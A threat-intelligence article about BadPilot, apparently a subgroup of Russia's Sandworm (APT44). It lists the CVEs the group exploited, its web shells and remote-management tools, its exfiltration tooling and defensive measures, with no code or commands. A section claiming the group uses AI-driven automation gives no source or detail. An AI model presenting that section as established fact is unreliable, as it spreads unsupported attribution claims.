Russian Sandworm Exploits BadPilot Network for Cyber Operations

A subgroup of the Russian state-sponsored hacking collective APT44, known as ‘Seashell Blizzard’ and ‘Sandworm,’ has been waging an aggressive, multi-year cyber campaign against critical organizations and government entities. Dubbed ‘BadPilot,’ this operation has been actively targeting energy, oil and gas, telecommunications, shipping, and arms manufacturing sectors since at least 2021.

Reports indicate that this subgroup acts as a dedicated initial access facilitator, allowing other APT44 units with more advanced cyber capabilities to conduct post-compromise activities. The significance of this effort is underscored by its role in paving the way for large-scale cyber intrusions and destructive attacks.

The Expanding Targeting Scope

Initial observations of the subgroup’s operations indicate that they targeted Ukraine, Europe, Central and South Asia, and the Middle East, primarily focusing on critical sectors. However, following Russia’s invasion of Ukraine in 2022, BadPilot significantly increased its cyber assaults against critical infrastructure supporting Ukraine. These included government, military, transportation, and logistics sectors, with the primary objectives being intelligence collection, operational disruptions, and data destruction through wiper attacks.

By 2023, BadPilot expanded its reach, compromising networks across Europe, the United States, and the Middle East. In 2024, the threat actors have further widened their scope, focusing heavily on the United States, United Kingdom, Canada, and Australia, demonstrating an aggressive escalation in cyber operations.

Initial Access Techniques and Exploited Vulnerabilities

The BadPilot subgroup employs a variety of techniques to infiltrate targeted networks, leveraging:

• Exploiting n-day vulnerabilities in internet-facing infrastructure
• Credential theft through phishing and social engineering
• Supply chain attacks targeting managed IT service providers

Supply-chain attacks have proven to be particularly effective in Ukraine and Europe, where hackers compromised IT service providers, gaining access to multiple downstream clients. Observations indicate that BadPilot has exploited vulnerabilities such as:

• CVE-2021–34473 (Microsoft Exchange)
• CVE-2022–41352 (Zimbra Collaboration Suite)
• CVE-2023–32315 (OpenFire)
• CVE-2023–42793 (JetBrains TeamCity)
• CVE-2023–23397 (Microsoft Outlook)
• CVE-2024–1709 (ConnectWise ScreenConnect)
• CVE-2023–48788 (Fortinet FortiClient EMS)

Once initial access is obtained, the hackers establish persistence using custom web shells such as ‘LocalOlive.’ Additionally, in 2024, they began leveraging legitimate IT remote management tools like Atera Agent and Splashtop Remote Services to execute commands while impersonating IT administrators, effectively evading detection.

Post-Compromise Activity and Network Persistence

Following successful intrusion, the attackers employ various techniques for credential theft and data exfiltration:

Credential Theft: Using Procdump or Windows registry access

Data Exfiltration: Utilizing Rclone, Chisel, and Plink to create covert network tunnels

Traffic Obfuscation: In 2024, attackers started routing traffic through the Tor network to mask inbound connections, making it difficult for security teams to track activity.

Lateral movement is a crucial aspect of BadPilot’s operations, as the hackers attempt to infiltrate as many parts of the network as possible. They modify critical infrastructure by:

Manipulating DNS configurations

• Creating new services and scheduled tasks
• Configuring backdoor access using OpenSSH with unique public keys
• These activities ensure sustained access for future attacks while complicating remediation efforts by cybersecurity teams.

Geopolitical Implications of BadPilot

The continued operations of BadPilot highlight the evolving nature of cyber warfare, with nation-state actors using cyber tools as a key component of their geopolitical strategies. Russia’s use of cyber tactics aligns with its broader military strategy, using cyberattacks as a force multiplier alongside conventional warfare.

Ukraine has been the most heavily targeted, but the campaign’s expansion to Western nations shows a clear intention to disrupt global operations, potentially influencing policy decisions and weakening international alliances. The targeting of industries such as telecommunications, energy, and military logistics suggests an effort to undermine economic and security infrastructures worldwide.

The Role of AI and Automation in Cyber Attacks

BadPilot has demonstrated increasing sophistication in its attack methodologies, incorporating AI-driven automation for reconnaissance and exploitation. Machine learning algorithms allow the hackers to rapidly identify and exploit vulnerabilities at scale, reducing the time needed for manual intrusion attempts. Automated attack frameworks also help obscure the origin of cyberattacks, making attribution and countermeasures more challenging for defenders.

Moreover, the use of AI in evasion techniques, such as dynamically altering attack signatures to bypass intrusion detection systems, underscores the need for enhanced cybersecurity measures leveraging AI-driven defense mechanisms.

Mitigation Strategies and Defensive Measures

To counter these threats, security teams have developed detailed hunting queries, indicators of compromise (IoCs), and YARA rules. These tools are designed to help detect and mitigate BadPilot-related threats before they escalate into full-blown cyber incidents. However, organizations must also adopt proactive security measures:

• Regular Patching and Vulnerability Management: Keeping software and infrastructure up to date to minimize exploitable vulnerabilities.
• Zero Trust Architecture: Implementing strict access controls to prevent unauthorized lateral movement within networks.
• Enhanced Threat Intelligence Sharing: Collaborating with industry partners and government agencies to stay ahead of emerging threats.
• AI-Driven Security Solutions: Leveraging machine learning for anomaly detection and real-time threat response.
• Employee Training and Awareness: Educating staff on phishing and social engineering tactics to reduce human-based vulnerabilities.

Conclusion

As APT44 continues refining its techniques and broadening its reach, organizations must remain vigilant against cyber threats. The BadPilot campaign exemplifies how nation-state actors exploit vulnerabilities and leverage automation to scale their attacks globally. By implementing proactive cybersecurity measures and fostering international cooperation, defenders can mitigate the impact of these cyber threats and protect critical infrastructure from disruption.